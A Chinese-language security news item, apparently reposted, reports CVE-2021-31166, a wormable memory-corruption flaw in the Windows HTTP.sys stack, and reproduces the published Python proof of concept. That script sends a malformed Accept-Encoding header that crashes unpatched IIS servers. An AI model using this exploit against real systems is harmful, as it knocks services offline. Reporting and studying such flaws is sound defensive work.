Windows操作系统HTTP协议栈内存破坏漏洞宣告
发布时间:2021-06-09 10:47:49 所属栏目:安全 来源:互联网
导读:5月微软补丁日修复了一个CVSSv3评分9.8分的严重安全漏洞,该漏洞CVE编号为CVE-2021-31166。近日,有研究人员在GitHub上公布了该漏洞的PoC代码。 CVE-2021-31166漏洞是Windows操作系统中HTTP 协议栈的内存破坏漏洞。该协议栈是Windows内置的IIS 服务器使用的
5月微软补丁日修复了一个CVSSv3评分9.8分的严重安全漏洞,该漏洞CVE编号为CVE-2021-31166。近日,有研究人员在GitHub上公布了该漏洞的PoC代码。
CVE-2021-31166漏洞是Windows操作系统中HTTP 协议栈的内存破坏漏洞。该协议栈是Windows内置的IIS 服务器使用的。如果IIS 服务器启用,攻击者就可以发送伪造的包来在操作系统kernel上执行也代码。微软称该漏洞可以被用来创建网络蠕虫,因此建议优先修复。
虽然该漏洞CVSS评分为9.8分,听起来非常危险,但该漏洞只影响最新的一些Windows版本,具体影响Windows 10、Windows server 2004、Windows server 20H2的不同版本。
5月17日,安全研究人员Axel Souchet在GitHub上公开了该漏洞的PoC代码。该PoC代码可以使运行IIS 服务器的未修复的Windows系统奔溃,但是并没有实现蠕虫功能。
PoC代码参见:https://github.com/0vercl0k/CVE-2021-31166
import requests
import argparse
def main():
parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
parser.add_argument('--target', required = True)
args = parser.parse_args()
r = requests.get(f'http://{args.target}/', headers = {
'Accept-Encoding': 'doar-e, ftw, imo, ,',
})
print(r)
![]() (编辑:呼伦贝尔站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |